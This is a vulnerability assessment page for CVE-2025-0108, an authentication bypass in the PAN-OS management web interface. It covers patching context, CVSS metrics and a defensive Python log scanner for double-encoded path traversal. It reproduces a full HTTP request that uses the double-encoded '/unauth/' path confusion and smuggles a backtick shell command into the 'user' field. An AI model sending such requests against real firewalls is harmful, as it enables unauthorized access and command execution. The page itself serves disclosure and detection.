Attacker Value: Moderate (1 user assessed)
Exploitability: Low (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2025-0108

Disclosure Date: February 12, 2025
Exploited in the Wild
Reported by AttackerKB Worker
MITRE ATT&CK Tactics: Initial Access
Validation: Validated

Description

An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS.

You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .

This issue does not affect Cloud NGFW or Prisma Access software.

Technical Analysis

On February 12, 2025, Palo Alto Networks published an advisory for CVE-2025-0108. The same day, Assetnote, the team that reported the vulnerability, published a comprehensive analysis. Exploitation for CVE-2025-0108 leverages a path confusion vulnerability in the PAN-OS management web service to access certain authenticated PHP files without administrator credentials.

In the original advisory, Palo Alto Networks stated “While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS.” The advisory was updated on February 18, 2025 to state “Palo Alto Networks has observed exploit attempts that utilize the PoC, chaining it with the exploit for CVE-2024-9474 on unpatched and unsecured PAN-OS web management interfaces.” For reference, CVE-2024-9474 is an older authenticated command injection vulnerability that was published in November of 2024 with CVE-2024-0012, an authentication bypass vulnerability.

As of February 18, 2025, despite public reports of RCE attempts in the wild, no public RCE chain PoC has been published for CVE-2025-0108. Our own tests that attempted to chain the new CVE-2025-0108 authentication bypass with the older CVE-2024-9474 authenticated command injection vulnerability were not successful. Although access to the PHP page associated with CVE-2024-9474 is permitted and “200 OK” is returned, a secondary privilege check fails.

POST /unauth/%252e%252e/php/utils/createRemoteAppwebSession.php/PAN_help/x.css HTTP/1.1
Host: 192.168.181.142
Origin: https://192.168.181.142
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://192.168.181.142/styles/login/css/login-admin.css?__version=1707420941
Accept-Encoding: gzip, deflate, br
Priority: u=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

user=%60echo%20%24%28uname%20-a%29%20%3E%20%2Fvar%2Fappweb%2Fhtdocs%2Funauth%2Fwritten.php&userRole=superuser&remoteHost=&vsys=vsys1

HTTP/1.1 200 OK
Date: Fri, 14 Feb 2025 14:05:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 32
Connection: keep-alive
Set-Cookie: PHPSESSID=ss7o7epm8g755pp3aqu6bgqo6n; path=/; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS

@start@Error: Unauthorized.@end@

That’s not to say that it can’t be done, just that we haven’t observed it working in tests. Although there may be some way to chain the newer authentication bypass with the older command injection, it also seems quite unlikely that such a chain would make sense from a logistical perspective. Both CVE-2024-9474, the authenticated command injection, and CVE-2024-0012, the authentication bypass, were predominantly fixed in the same patches. Furthermore, they were widely publicized together in November of 2024; it would be surprising to see CVE-2024-9474 unpatched with CVE-2024-0012 patched. If CVE-2024-0012 was not patched, there would be no need to exploit the newer CVE-2025-0108 authentication bypass.

Despite this context, CVE-2025-0108 is an impactful and important vulnerability for organizations running PAN-OS devices. It’s likely that some escalation path exists, if not a CVE-2024-9474 chain, so CVE-2025-0108 should be prioritized for patching. Additionally, per Palo Alto Networks recommendations, network access to the PAN-OS management interface should be as restrictive as possible to avoid unnecessary exposure.

02/19/25 NOTE: The Palo Alto Networks advisory page for CVE-2025-0108 has been updated to indicate that CVE-2025-0111, an authenticated file read, has also been observed in chained exploitation attempts with CVE-2025-0108 in the wild.
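The request reproduced above reaches an authenticated PHP script through a double-encoded `..` segment under the unauthenticated `/unauth/` tree. The following is an added detection example, not code from the assessment author or from Palo Alto Networks: it parses access-log lines in a generic combined-log layout (the log format, the field names and the sample lines are constructed assumptions, not PAN-OS log output), percent-decodes each request target repeatedly, collapses `..` segments the way a filesystem would, and flags any request that lands outside `/unauth/` after decoding or that needed more than one decode pass.

```python
"""
Detect double-encoded path traversal ("path confusion") requests against the
PAN-OS management web interface in access-log lines.

Added example; it is not PAN-OS code and not from the original assessment.
The log format, the field names and the sample lines are assumptions
constructed for this example.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in a common access-log layout (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Feb/2025:14:05:01 +0000] "POST /unauth/%252e%252e/php/utils/createRemoteAppwebSession.php/PAN_help/x.css HTTP/1.1" 200 32
192.0.2.11 - - [14/Feb/2025:14:05:07 +0000] "GET /unauth/%2e%2e/php/login.php HTTP/1.1" 200 1024
192.0.2.12 - - [14/Feb/2025:14:06:00 +0000] "GET /styles/login/css/login-admin.css?__version=1707420941 HTTP/1.1" 200 4096
192.0.2.13 - - [14/Feb/2025:14:06:30 +0000] "GET /unauth/PAN_help/index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Tree the management web server serves without authentication (taken from
# the request on the page); anything that escapes it after decoding is suspect.
UNAUTH_PREFIX = "/unauth/"
MAX_DECODE_ROUNDS = 3


def decode_path(raw_target):
    """Strip the query string and percent-decode repeatedly.

    Returns (decoded_path, rounds) where rounds counts how many decode passes
    actually changed the string: 1 for %2e, 2 for %252e (double encoding).
    """
    path = raw_target.split("?", 1)[0]
    rounds = 0
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        rounds += 1
    return path, rounds


def resolve_path(decoded_path):
    """Collapse '.' and '..' segments the way a filesystem would.

    Returns (resolved_path, dotdot_count).
    """
    segments = []
    dotdot = 0
    for seg in decoded_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            dotdot += 1
            if segments:
                segments.pop()
        else:
            segments.append(seg)
    return "/" + "/".join(segments), dotdot


def inspect_target(raw_target):
    """Return the list of reasons this request target looks like path confusion."""
    decoded, rounds = decode_path(raw_target)
    resolved, dotdot = resolve_path(decoded)
    reasons = []
    if dotdot:
        reasons.append("'..' segment present after %d decode round(s)" % rounds)
    if rounds >= 2:
        reasons.append("double percent-encoding")
    if decoded.startswith(UNAUTH_PREFIX) and not resolved.startswith(UNAUTH_PREFIX):
        reasons.append("request under %s resolves to %s" % (UNAUTH_PREFIX, resolved))
    return reasons


def scan_log(text):
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line; skip rather than guess
        reasons = inspect_target(m.group("target"))
        if reasons:
            findings.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["src"], f["method"], f["target"], "->", "; ".join(f["reasons"]))
```

On the constructed sample the first two lines are flagged (the double-encoded and the single-encoded traversal), while the stylesheet request and the legitimate `/unauth/PAN_help/` request are not. Decoding is bounded to a few rounds so a pathological input cannot loop the scanner, and the single-encoded case is kept as a finding because the resolved path still leaves `/unauth/`; a 200 status on such a request, as in the page's response, is the signal worth paging on.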

CVSS V3 Severity and Metrics
Base Score: 9.1 Critical
Impact Score: 5.2
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): None
